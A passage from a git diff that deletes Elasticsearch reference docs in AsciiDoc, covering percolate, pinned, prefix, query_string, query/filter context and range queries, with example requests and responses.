}, - "highlight": { - "message": [ - "The quick brown fox jumps over the lazy dog" <1> - ] - }, - "fields" : { - "_percolator_document_slot" : [0] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 7,/"took": "$body.took",/] - -<1> The terms from each query have been highlighted in the document. - -Instead of the query in the search request highlighting the percolator hits, the percolator queries are highlighting -the document defined in the `percolate` query. - -When percolating multiple documents at the same time like the request below then the highlight response is different: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "percolate": { - "field": "query", - "documents": [ - { - "message": "bonsai tree" - }, - { - "message": "new tree" - }, - { - "message": "the office" - }, - { - "message": "office tree" - } - ] - } - }, - "highlight": { - "fields": { - "message": {} - } - } -} --------------------------------------------------- -// TEST[continued] - -The slightly different response: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.7093853, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.7093853, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot" : [0, 1, 3] - }, - "highlight" : { <1> - "0_message" : [ - "bonsai tree" - ], - "3_message" : [ - "office tree" - ], - "1_message" : [ - "new tree" - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The highlight fields have been prefixed with the document slot they belong to, - in order to know which highlight field belongs to what document. - -[discrete] -==== Specifying multiple percolate queries - -It is possible to specify multiple `percolate` queries in a single search request: - -[source,console] --------------------------------------------------- -GET /my-index-00001/_search -{ - "query": { - "bool": { - "should": [ - { - "percolate": { - "field": "query", - "document": { - "message": "bonsai tree" - }, - "name": "query1" <1> - } - }, - { - "percolate": { - "field": "query", - "document": { - "message": "tulip flower" - }, - "name": "query2" <1> - } - } - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `name` parameter will be used to identify which percolator document slots belong to what `percolate` query. - -The `_percolator_document_slot` field name will be suffixed with what is specified in the `_name` parameter. -If that isn't specified then the `field` parameter will be used, which in this case will result in ambiguity. - -The above search request returns a response similar to this: - -[source,console-result] --------------------------------------------------- -{ - "took": 13, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.26152915, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.26152915, - "_source": { - "query": { - "match": { - "message": "bonsai tree" - } - } - }, - "fields" : { - "_percolator_document_slot_query1" : [0] <1> - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 13,/"took": "$body.took",/] - -<1> The `_percolator_document_slot_query1` percolator slot field indicates that these matched slots are from the `percolate` - query with `_name` parameter set to `query1`. - -[discrete] -[[how-it-works]] -==== How it Works Under the Hood - -When indexing a document into an index that has the <> mapping configured, the query -part of the document gets parsed into a Lucene query and is stored into the Lucene index. A binary representation -of the query gets stored, but also the query's terms are analyzed and stored into an indexed field. - -At search time, the document specified in the request gets parsed into a Lucene document and is stored in a in-memory -temporary Lucene index. This in-memory index can just hold this one document and it is optimized for that. After this -a special query is built based on the terms in the in-memory index that select candidate percolator queries based on -their indexed query terms. These queries are then evaluated by the in-memory index if they actually match. - -The selecting of candidate percolator queries matches is an important performance optimization during the execution -of the `percolate` query as it can significantly reduce the number of candidate matches the in-memory index needs to -evaluate. The reason the `percolate` query can do this is because during indexing of the percolator queries the query -terms are being extracted and indexed with the percolator query. Unfortunately the percolator cannot extract terms from -all queries (for example the `wildcard` or `geo_shape` query) and as a result of that in certain cases the percolator -can't do the selecting optimization (for example if an unsupported query is defined in a required clause of a boolean query -or the unsupported query is the only query in the percolator document). These queries are marked by the percolator and -can be found by running the following search: - - -[source,console] ---------------------------------------------------- -GET /_search -{ - "query": { - "term" : { - "query.extraction_result" : "failed" - } - } -} ---------------------------------------------------- - -NOTE: The above example assumes that there is a `query` field of type -`percolator` in the mappings. - -Given the design of percolation, it often makes sense to use separate indices for the percolate queries and documents -being percolated, as opposed to a single index as we do in examples. There are a few benefits to this approach: - -- Because percolate queries contain a different set of fields from the percolated documents, using two separate indices -allows for fields to be stored in a denser, more efficient way. -- Percolate queries do not scale in the same way as other queries, so percolation performance may benefit from using -a different index configuration, like the number of primary shards. - -[[percolate-query-notes]] -==== Notes -===== Allow expensive queries -Percolate queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/pinned-query.asciidoc b/docs/reference/query-dsl/pinned-query.asciidoc deleted file mode 100644 index c55df9ff86f..00000000000 --- a/docs/reference/query-dsl/pinned-query.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[query-dsl-pinned-query]] -=== Pinned Query -Promotes selected documents to rank higher than those matching a given query. -This feature is typically used to guide searchers to curated documents that are -promoted over and above any "organic" matches for a search. -The promoted or "pinned" documents are identified using the document IDs stored in -the <> field. - -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "pinned": { - "ids": [ "1", "4", "100" ], - "organic": { - "match": { - "description": "iphone" - } - } - } - } -} --------------------------------------------------- - -[[pinned-query-top-level-parameters]] -==== Top-level parameters for `pinned` - -`ids`:: -An array of <> listed in the order they are to appear in results. -`organic`:: -Any choice of query used to rank documents which will be ranked below the "pinned" document ids. diff --git a/docs/reference/query-dsl/prefix-query.asciidoc b/docs/reference/query-dsl/prefix-query.asciidoc deleted file mode 100644 index b400924edb1..00000000000 --- a/docs/reference/query-dsl/prefix-query.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[query-dsl-prefix-query]] -=== Prefix query -++++ -Prefix -++++ - -Returns documents that contain a specific prefix in a provided field. - -[[prefix-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains a term -that begins with `ki`. - -[source,console] ----- -GET /_search -{ - "query": { - "prefix": { - "user.id": { - "value": "ki" - } - } - } -} ----- - -[[prefix-query-top-level-params]] -==== Top-level parameters for `prefix` -``:: -(Required, object) Field you wish to search. - -[[prefix-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Beginning characters of terms you wish to find in the -provided ``. - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -`case_insensitive`:: -(Optional, Boolean) allows ASCII case insensitive matching of the -value with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping. - -[[prefix-query-notes]] -==== Notes - -[[prefix-query-short-ex]] -===== Short request example -You can simplify the `prefix` query syntax by combining the `` and -`value` parameters. For example: - -[source,console] ----- -GET /_search -{ - "query": { - "prefix" : { "user" : "ki" } - } -} ----- - -[[prefix-query-index-prefixes]] -===== Speed up prefix queries -You can speed up prefix queries using the <> -mapping parameter. If enabled, {es} indexes prefixes between 2 and 5 -characters in a separate field. This lets {es} run prefix queries more -efficiently at the cost of a larger index. - -[[prefix-query-allow-expensive-queries]] -===== Allow expensive queries -Prefix queries will not be executed if <> -is set to false. However, if <> are enabled, an optimised query is built which -is not considered slow, and will be executed in spite of this setting. diff --git a/docs/reference/query-dsl/query-string-query.asciidoc b/docs/reference/query-dsl/query-string-query.asciidoc deleted file mode 100644 index a36289722a7..00000000000 --- a/docs/reference/query-dsl/query-string-query.asciidoc +++ /dev/null @@ -1,554 +0,0 @@ -[[query-dsl-query-string-query]] -=== Query string query -++++ -Query string -++++ - -Returns documents based on a provided query string, using a parser with a strict -syntax. - -This query uses a <> to parse and split the provided -query string based on operators, such as `AND` or `NOT`. The query -then <> each split text independently before returning -matching documents. - -You can use the `query_string` query to create a complex search that includes -wildcard characters, searches across multiple fields, and more. While versatile, -the query is strict and returns an error if the query string includes any -invalid syntax. - -[WARNING] -==== -Because it returns an error for any invalid syntax, we don't recommend using -the `query_string` query for search boxes. - -If you don't need to support a query syntax, consider using the -<> query. If you need the features of a query -syntax, use the <> -query, which is less strict. -==== - - -[[query-string-query-ex-request]] -==== Example request - -When running the following search, the `query_string` query splits `(new york -city) OR (big apple)` into two parts: `new york city` and `big apple`. The -`content` field's analyzer then independently converts each part into tokens -before returning matching documents. Because the query syntax does not use -whitespace as an operator, `new york city` is passed as-is to the analyzer. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "(new york city) OR (big apple)", - "default_field": "content" - } - } -} --------------------------------------------------- - -[[query-string-top-level-params]] -==== Top-level parameters for `query_string` -`query`:: -(Required, string) Query string you wish to parse and use for search. See -<>. - -`default_field`:: -+ --- -(Optional, string) Default field you wish to search if no field is provided in -the query string. - -Defaults to the `index.query.default_field` index setting, which has a default -value of `*`. The `*` value extracts all fields that are eligible for term -queries and filters the metadata fields. All extracted fields are then -combined to build a query if no `prefix` is specified. - -Searching across all eligible fields does not include <>. Use a <> to search those -documents. - -[[WARNING]] -==== -For mappings with a large number of fields, searching across all eligible fields -could be expensive. - -There is a limit on the number of fields that can be queried at once. -It is defined by the `indices.query.bool.max_clause_count` -<>, which defaults to 1024. -==== --- - -`allow_leading_wildcard`:: -(Optional, Boolean) If `true`, the wildcard characters `*` and `?` are allowed -as the first character of the query string. Defaults to `true`. - -`analyze_wildcard`:: -(Optional, Boolean) If `true`, the query attempts to analyze wildcard terms in -the query string. Defaults to `false`. - -`analyzer`:: -(Optional, string) <> used to convert text in the -query string into tokens. Defaults to the -<> mapped for the -`default_field`. If no analyzer is mapped, the index's default analyzer is used. - -`auto_generate_synonyms_phrase_query`:: -(Optional, Boolean) If `true`, <> -queries are automatically created for multi-term synonyms. Defaults to `true`. -See <> for an example. - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase the -<> of the query. Defaults to `1.0`. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -`default_operator`:: -+ --- -(Optional, string) Default boolean logic used to interpret text in the query -string if no operators are specified. Valid values are: - - `OR` (Default):: -For example, a query string of `capital of Hungary` is interpreted as `capital -OR of OR Hungary`. - - `AND`:: -For example, a query string of `capital of Hungary` is interpreted as `capital -AND of AND Hungary`. --- - -`enable_position_increments`:: -(Optional, Boolean) If `true`, enable position increments in queries constructed -from a `query_string` search. Defaults to `true`. - -`fields`:: -+ --- -(Optional, array of strings) Array of fields you wish to search. - -You can use this parameter query to search across multiple fields. See -<>. --- - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. - -`fuzzy_max_expansions`:: -(Optional, integer) Maximum number of terms to which the query expands for fuzzy -matching. Defaults to `50`. - -`fuzzy_prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged for fuzzy -matching. Defaults to `0`. - -`fuzzy_transpositions`:: -(Optional, Boolean) If `true`, edits for fuzzy matching include -transpositions of two adjacent characters (ab → ba). Defaults to `true`. - -`lenient`:: -(Optional, Boolean) If `true`, format-based errors, such as providing a text -value for a <> field, are ignored. Defaults to `false`. - -`max_determinized_states`:: -+ --- -(Optional, integer) Maximum number of -{wikipedia}/Deterministic_finite_automaton[automaton states] -required for the query. Default is `10000`. - -{es} uses https://lucene.apache.org/core/[Apache Lucene] internally to parse -regular expressions. Lucene converts each regular expression to a finite -automaton containing a number of determinized states. - -You can use this parameter to prevent that conversion from unintentionally -consuming too many resources. You may need to increase this limit to run complex -regular expressions. --- - -`minimum_should_match`:: -(Optional, string) Minimum number of clauses that must match for a document to -be returned. See the <> for valid values and more information. See -<> for an example. - -`quote_analyzer`:: -+ --- -(Optional, string) <> used to convert quoted text in the -query string into tokens. Defaults to the -<> mapped for the -`default_field`. - -For quoted text, this parameter overrides the analyzer specified in the -`analyzer` parameter. --- - -`phrase_slop`:: -(Optional, integer) Maximum number of positions allowed between matching tokens -for phrases. Defaults to `0`. If `0`, exact phrase matches are required. -Transposed terms have a slop of `2`. - -`quote_field_suffix`:: -+ --- -(Optional, string) Suffix appended to quoted text in the query string. - -You can use this suffix to use a different analysis method for exact matches. -See <>. --- - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -`time_zone`:: -+ --- -(Optional, string) -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC) offset] or -{wikipedia}/List_of_tz_database_time_zones[IANA time zone] -used to convert `date` values in the query string to UTC. - -Valid values are ISO 8601 UTC offsets, such as `+01:00` or -`08:00`, and IANA -time zone IDs, such as `America/Los_Angeles`. - -[NOTE] -==== -The `time_zone` parameter does **not** affect the <> value -of `now`. `now` is always the current system time in UTC. However, the -`time_zone` parameter does convert dates calculated using `now` and -<>. For example, the `time_zone` parameter will -convert a value of `now/d`. -==== --- - -[[query-string-query-notes]] -==== Notes - -include::query-string-syntax.asciidoc[] - -[[query-string-nested]] -====== Avoid using the `query_string` query for nested documents - -`query_string` searches do not return <> documents. To search -nested documents, use the <>. - -[[query-string-multi-field]] -====== Search multiple fields - -You can use the `fields` parameter to perform a `query_string` search across -multiple fields. - -The idea of running the `query_string` query against multiple fields is to -expand each query term to an OR clause like this: - -``` -field1:query_term OR field2:query_term | ... -``` - -For example, the following query - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ "content", "name" ], - "query": "this AND that" - } - } -} --------------------------------------------------- - -matches the same words as - - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "(content:this OR name:this) AND (content:that OR name:that)" - } - } -} --------------------------------------------------- - -Since several queries are generated from the individual search terms, -combining them is automatically done using a `dis_max` query with a `tie_breaker`. -For example (the `name` is boosted by 5 using `^5` notation): - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "fields" : ["content", "name^5"], - "query" : "this AND that OR thus", - "tie_breaker" : 0 - } - } -} --------------------------------------------------- - -Simple wildcard can also be used to search "within" specific inner -elements of the document. For example, if we have a `city` object with -several fields (or inner object with fields) in it, we can automatically -search on all "city" fields: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "fields" : ["city.*"], - "query" : "this AND that OR thus" - } - } -} --------------------------------------------------- - -Another option is to provide the wildcard fields search in the query -string itself (properly escaping the `*` sign), for example: -`city.\*:something`: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "query" : "city.\\*:(this AND that OR thus)" - } - } -} --------------------------------------------------- - -NOTE: Since `\` (backslash) is a special character in json strings, it needs to -be escaped, hence the two backslashes in the above `query_string`. - -The fields parameter can also include pattern based field names, -allowing to automatically expand to the relevant fields (dynamically -introduced fields included). For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "fields" : ["content", "name.*^5"], - "query" : "this AND that OR thus" - } - } -} --------------------------------------------------- - -[[query-string-multi-field-parms]] -====== Additional parameters for multiple field searches - -When running the `query_string` query against multiple fields, the -following additional parameters are supported. - -`type`:: -+ --- -(Optional, string) Determines how the query matches and scores documents. Valid -values are: - -`best_fields` (Default):: -Finds documents which match any field and uses the highest -<> from any matching field. See -<>. - -`bool_prefix`:: -Creates a `match_bool_prefix` query on each field and combines the `_score` from -each field. See <>. - -`cross_fields`:: -Treats fields with the same `analyzer` as though they were one big field. Looks -for each word in **any** field. See <>. - -`most_fields`:: -Finds documents which match any field and combines the `_score` from each field. -See <>. - -`phrase`:: -Runs a `match_phrase` query on each field and uses the `_score` from the best -field. See <>. - -`phrase_prefix`:: -Runs a `match_phrase_prefix` query on each field and uses the `_score` from the -best field. See <>. - -NOTE: -Additional top-level `multi_match` parameters may be available based on the -<> value. --- - -[[query-string-synonyms]] -===== Synonyms and the `query_string` query - -The `query_string` query supports multi-terms synonym expansion with the <> token filter. When this filter is used, the parser creates a phrase query for each multi-terms synonyms. -For example, the following synonym: `ny, new york` would produce: - -`(ny OR ("new york"))` - -It is also possible to match multi terms synonyms with conjunctions instead: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string" : { - "default_field": "title", - "query" : "ny city", - "auto_generate_synonyms_phrase_query" : false - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(ny OR (new AND york)) city` - -that matches documents with the term `ny` or the conjunction `new AND york`. -By default the parameter `auto_generate_synonyms_phrase_query` is set to `true`. - -[[query-string-min-should-match]] -===== How `minimum_should_match` works - -The `query_string` splits the query around each operator to create a boolean -query for the entire input. You can use `minimum_should_match` to control how -many "should" clauses in the resulting query should match. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title" - ], - "query": "this that thus", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(title:this title:that title:thus)~2` - -that matches documents with at least two of the terms `this`, `that` or `thus` -in the single field `title`. - -[[query-string-min-should-match-multi]] -===== How `minimum_should_match` works for multiple fields - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title", - "content" - ], - "query": "this that thus", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`((content:this content:that content:thus) | (title:this title:that title:thus))` - -that matches documents with the disjunction max over the fields `title` and -`content`. Here the `minimum_should_match` parameter can't be applied. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title", - "content" - ], - "query": "this OR that OR thus", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -Adding explicit operators forces each term to be considered as a separate clause. - -The example above creates a boolean query: - -`((content:this | title:this) (content:that | title:that) (content:thus | title:thus))~2` - -that matches documents with at least two of the three "should" clauses, each of -them made of the disjunction max over the fields for each term. - -[[query-string-min-should-match-cross]] -===== How `minimum_should_match` works for cross-field searches - -A `cross_fields` value in the `type` field indicates fields with the same -analyzer are grouped together when the input is analyzed. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "fields": [ - "title", - "content" - ], - "query": "this OR that OR thus", - "type": "cross_fields", - "minimum_should_match": 2 - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(blended(terms:[field2:this, field1:this]) blended(terms:[field2:that, field1:that]) blended(terms:[field2:thus, field1:thus]))~2` - -that matches documents with at least two of the three per-term blended queries. - -===== Allow expensive queries -Query string query can be internally be transformed to a <> which means -that if the prefix queries are disabled as explained <> the query will not be -executed and an exception will be thrown. diff --git a/docs/reference/query-dsl/query-string-syntax.asciidoc b/docs/reference/query-dsl/query-string-syntax.asciidoc deleted file mode 100644 index 52c9030acb2..00000000000 --- a/docs/reference/query-dsl/query-string-syntax.asciidoc +++ /dev/null @@ -1,320 +0,0 @@ -[[query-string-syntax]] - -===== Query string syntax - -The query string ``mini-language'' is used by the -<> and by the -`q` query string parameter in the <>. - -The query string is parsed into a series of _terms_ and _operators_. A -term can be a single word -- `quick` or `brown` -- or a phrase, surrounded by -double quotes -- `"quick brown"` -- which searches for all the words in the -phrase, in the same order. - -Operators allow you to customize the search -- the available options are -explained below. - -====== Field names - -You can specify fields to search in the query syntax: - -* where the `status` field contains `active` - - status:active - -* where the `title` field contains `quick` or `brown` - - title:(quick OR brown) - -* where the `author` field contains the exact phrase `"john smith"` - - author:"John Smith" - -* where the `first name` field contains `Alice` (note how we need to escape - the space with a backslash) - - first\ name:Alice - -* where any of the fields `book.title`, `book.content` or `book.date` contains - `quick` or `brown` (note how we need to escape the `*` with a backslash): - - book.\*:(quick OR brown) - -* where the field `title` has any non-null value: - - _exists_:title - -[[query-string-wildcard]] -====== Wildcards - -Wildcard searches can be run on individual terms, using `?` to replace -a single character, and `*` to replace zero or more characters: - - qu?ck bro* - -Be aware that wildcard queries can use an enormous amount of memory and -perform very badly -- just think how many terms need to be queried to -match the query string `"a* b* c*"`. - -[WARNING] -======= -Pure wildcards `\*` are rewritten to <> queries for efficiency. -As a consequence, the wildcard `"field:*"` would match documents with an empty value - like the following: -``` -{ - "field": "" -} -``` -\... and would **not** match if the field is missing or set with an explicit null -value like the following: -``` -{ - "field": null -} -``` -======= - -[WARNING] -======= -Allowing a wildcard at the beginning of a word (eg `"*ing"`) is particularly -heavy, because all terms in the index need to be examined, just in case -they match. Leading wildcards can be disabled by setting -`allow_leading_wildcard` to `false`. -======= - -Only parts of the analysis chain that operate at the character level are -applied. So for instance, if the analyzer performs both lowercasing and -stemming, only the lowercasing will be applied: it would be wrong to perform -stemming on a word that is missing some of its letters. - -By setting `analyze_wildcard` to true, queries that end with a `*` will be -analyzed and a boolean query will be built out of the different tokens, by -ensuring exact matches on the first N-1 tokens, and prefix match on the last -token. - -====== Regular expressions - -Regular expression patterns can be embedded in the query string by -wrapping them in forward-slashes (`"/"`): - - name:/joh?n(ath[oa]n)/ - -The supported regular expression syntax is explained in <>. - -[WARNING] -======= -The `allow_leading_wildcard` parameter does not have any control over -regular expressions. A query string such as the following would force -Elasticsearch to visit every term in the index: - - /.*n/ - -Use with caution! -======= - -[[query-string-fuzziness]] -====== Fuzziness - -We can search for terms that are -similar to, but not exactly like our search terms, using the ``fuzzy'' -operator: - - quikc~ brwn~ foks~ - -This uses the -{wikipedia}/Damerau-Levenshtein_distance[Damerau-Levenshtein distance] -to find all terms with a maximum of -two changes, where a change is the insertion, deletion -or substitution of a single character, or transposition of two adjacent -characters. - -The default _edit distance_ is `2`, but an edit distance of `1` should be -sufficient to catch 80% of all human misspellings. It can be specified as: - - quikc~1 - -[[avoid-widlcards-fuzzy-searches]] -[WARNING] -.Avoid mixing fuzziness with wildcards -==== -Mixing <> and <> operators is -_not_ supported. When mixed, one of the operators is not applied. For example, -you can search for `app~1` (fuzzy) or `app*` (wildcard), but searches for -`app*~1` do not apply the fuzzy operator (`~1`). -==== - -====== Proximity searches - -While a phrase query (eg `"john smith"`) expects all of the terms in exactly -the same order, a proximity query allows the specified words to be further -apart or in a different order. In the same way that fuzzy queries can -specify a maximum edit distance for characters in a word, a proximity search -allows us to specify a maximum edit distance of words in a phrase: - - "fox quick"~5 - -The closer the text in a field is to the original order specified in the -query string, the more relevant that document is considered to be. When -compared to the above example query, the phrase `"quick fox"` would be -considered more relevant than `"quick brown fox"`. - -====== Ranges - -Ranges can be specified for date, numeric or string fields. Inclusive ranges -are specified with square brackets `[min TO max]` and exclusive ranges with -curly brackets `{min TO max}`. - -* All days in 2012: - - date:[2012-01-01 TO 2012-12-31] - -* Numbers 1..5 - - count:[1 TO 5] - -* Tags between `alpha` and `omega`, excluding `alpha` and `omega`: - - tag:{alpha TO omega} - -* Numbers from 10 upwards - - count:[10 TO *] - -* Dates before 2012 - - date:{* TO 2012-01-01} - -Curly and square brackets can be combined: - -* Numbers from 1 up to but not including 5 - - count:[1 TO 5} - - -Ranges with one side unbounded can use the following syntax: - - age:>10 - age:>=10 - age:<10 - age:<=10 - -[NOTE] -==================================================================== -To combine an upper and lower bound with the simplified syntax, you -would need to join two clauses with an `AND` operator: - - age:(>=10 AND <20) - age:(+>=10 +<20) - -==================================================================== - -The parsing of ranges in query strings can be complex and error prone. It is -much more reliable to use an explicit <>. - - -====== Boosting - -Use the _boost_ operator `^` to make one term more relevant than another. -For instance, if we want to find all documents about foxes, but we are -especially interested in quick foxes: - - quick^2 fox - -The default `boost` value is 1, but can be any positive floating point number. -Boosts between 0 and 1 reduce relevance. - -Boosts can also be applied to phrases or to groups: - - "john smith"^2 (foo bar)^4 - -====== Boolean operators - -By default, all terms are optional, as long as one term matches. A search -for `foo bar baz` will find any document that contains one or more of -`foo` or `bar` or `baz`. We have already discussed the `default_operator` -above which allows you to force all terms to be required, but there are -also _boolean operators_ which can be used in the query string itself -to provide more control. - -The preferred operators are `+` (this term *must* be present) and `-` -(this term *must not* be present). All other terms are optional. -For example, this query: - - quick brown +fox -news - -states that: - -* `fox` must be present -* `news` must not be present -* `quick` and `brown` are optional -- their presence increases the relevance - -The familiar boolean operators `AND`, `OR` and `NOT` (also written `&&`, `||` -and `!`) are also supported but beware that they do not honor the usual -precedence rules, so parentheses should be used whenever multiple operators are -used together. For instance the previous query could be rewritten as: - -`((quick AND fox) OR (brown AND fox) OR fox) AND NOT news`:: - -This form now replicates the logic from the original query correctly, but -the relevance scoring bears little resemblance to the original. - -In contrast, the same query rewritten using the <> -would look like this: - - { - "bool": { - "must": { "match": "fox" }, - "should": { "match": "quick brown" }, - "must_not": { "match": "news" } - } - } - - -====== Grouping - -Multiple terms or clauses can be grouped together with parentheses, to form -sub-queries: - - (quick OR brown) AND fox - -Groups can be used to target a particular field, or to boost the result -of a sub-query: - - status:(active OR pending) title:(full text search)^2 - -====== Reserved characters - -If you need to use any of the characters which function as operators in your -query itself (and not as operators), then you should escape them with -a leading backslash. For instance, to search for `(1+1)=2`, you would -need to write your query as `\(1\+1\)\=2`. When using JSON for the request body, two preceding backslashes (`\\`) are required; the backslash is a reserved escaping character in JSON strings. - -[source,console] ----- -GET /my-index-000001/_search -{ - "query" : { - "query_string" : { - "query" : "kimchy\\!", - "fields" : ["user.id"] - } - } -} ----- -// TEST[setup:my_index] - -The reserved characters are: `+ - = && || > < ! ( ) { } [ ] ^ " ~ * ? : \ /` - -Failing to escape these special characters correctly could lead to a syntax error which prevents your query from running. - -NOTE: `<` and `>` can't be escaped at all. The only way to prevent them from -attempting to create a range query is to remove them from the query string -entirely. - -====== Whitespaces and empty queries - -Whitespace is not considered an operator. - -If the query string is empty or only contains whitespaces the query will -yield an empty result set. diff --git a/docs/reference/query-dsl/query_filter_context.asciidoc b/docs/reference/query-dsl/query_filter_context.asciidoc deleted file mode 100644 index 0aa0eb994cb..00000000000 --- a/docs/reference/query-dsl/query_filter_context.asciidoc +++ /dev/null @@ -1,96 +0,0 @@ -[[query-filter-context]] -== Query and filter context - -[discrete] -[[relevance-scores]] -=== Relevance scores - -By default, Elasticsearch sorts matching search results by **relevance -score**, which measures how well each document matches a query. - -The relevance score is a positive floating point number, returned in the -`_score` metadata field of the <> API. The higher the -`_score`, the more relevant the document. While each query type can calculate -relevance scores differently, score calculation also depends on whether the -query clause is run in a **query** or **filter** context. - -[discrete] -[[query-context]] -=== Query context -In the query context, a query clause answers the question ``__How well does this -document match this query clause?__'' Besides deciding whether or not the -document matches, the query clause also calculates a relevance score in the -`_score` metadata field. - -Query context is in effect whenever a query clause is passed to a `query` -parameter, such as the `query` parameter in the -<> API. - -[discrete] -[[filter-context]] -=== Filter context -In a filter context, a query clause answers the question ``__Does this -document match this query clause?__'' The answer is a simple Yes or No -- no -scores are calculated. Filter context is mostly used for filtering structured -data, e.g. - -* __Does this +timestamp+ fall into the range 2015 to 2016?__ -* __Is the +status+ field set to ++"published"++__? - -Frequently used filters will be cached automatically by Elasticsearch, to -speed up performance. - -Filter context is in effect whenever a query clause is passed to a `filter` -parameter, such as the `filter` or `must_not` parameters in the -<> query, the `filter` parameter in the -<> query, or the -<> aggregation. - -[discrete] -[[query-filter-context-ex]] -=== Example of query and filter contexts -Below is an example of query clauses being used in query and filter context -in the `search` API. This query will match documents where all of the following -conditions are met: - -* The `title` field contains the word `search`. -* The `content` field contains the word `elasticsearch`. -* The `status` field contains the exact word `published`. -* The `publish_date` field contains a date from 1 Jan 2015 onwards. - -[source,console] ------------------------------------- -GET /_search -{ - "query": { <1> - "bool": { <2> - "must": [ - { "match": { "title": "Search" }}, - { "match": { "content": "Elasticsearch" }} - ], - "filter": [ <3> - { "term": { "status": "published" }}, - { "range": { "publish_date": { "gte": "2015-01-01" }}} - ] - } - } -} ------------------------------------- - -<1> The `query` parameter indicates query context. -<2> The `bool` and two `match` clauses are used in query context, - which means that they are used to score how well each document - matches. -<3> The `filter` parameter indicates filter context. Its `term` and - `range` clauses are used in filter context. They will filter out - documents which do not match, but they will - not affect the score for matching documents. - -WARNING: Scores calculated for queries in query context are represented -as single precision floating point numbers; they have only -24 bits for significand's precision. Score calculations that exceed the -significand's precision will be converted to floats with loss of precision. - -TIP: Use query clauses in query context for conditions which should affect the -score of matching documents (i.e. how well does the document match), and use -all other query clauses in filter context. \ No newline at end of file diff --git a/docs/reference/query-dsl/range-query.asciidoc b/docs/reference/query-dsl/range-query.asciidoc deleted file mode 100644 index 32184875aa0..00000000000 --- a/docs/reference/query-dsl/range-query.asciidoc +++ /dev/null @@ -1,252 +0,0 @@ -[[query-dsl-range-query]] -=== Range query -++++ -Range -++++ - -Returns documents that contain terms within a provided range. - -[[range-query-ex-request]] -==== Example request - -The following search returns documents where the `age` field contains a term -between `10` and `20`. - -[source,console] ----- -GET /_search -{ - "query": { - "range": { - "age": { - "gte": 10, - "lte": 20, - "boost": 2.0 - } - } - } -} ----- - -[[range-query-top-level-params]] -==== Top-level parameters for `range` - -``:: -+ --- -(Required, object) Field you wish to search. --- - -[[range-query-field-params]] -==== Parameters for `` - -`gt`:: -(Optional) Greater than. - -`gte`:: -(Optional) Greater than or equal to. - -`lt`:: -(Optional) Less than. - -`lte`:: -(Optional) Less than or equal to. - -`format`:: -+ --- -(Optional, string) Date format used to convert `date` values in the query. - -By default, {es} uses the <> provided in the -``'s mapping. This value overrides that mapping format. - -For valid syntax, see <>. - -WARNING: If a format or date value is incomplete, the range query replaces any -missing components with default values. See <>. - --- - -[[querying-range-fields]] -`relation`:: -+ --- -(Optional, string) Indicates how the range query matches values for `range` -fields. Valid values are: - -`INTERSECTS` (Default):: -Matches documents with a range field value that intersects the query's range. - -`CONTAINS`:: -Matches documents with a range field value that entirely contains the query's range. - -`WITHIN`:: -Matches documents with a range field value entirely within the query's range. --- - -`time_zone`:: -+ --- -(Optional, string) -{wikipedia}/List_of_UTC_time_offsets[Coordinated Universal -Time (UTC) offset] or -{wikipedia}/List_of_tz_database_time_zones[IANA time zone] -used to convert `date` values in the query to UTC. - -Valid values are ISO 8601 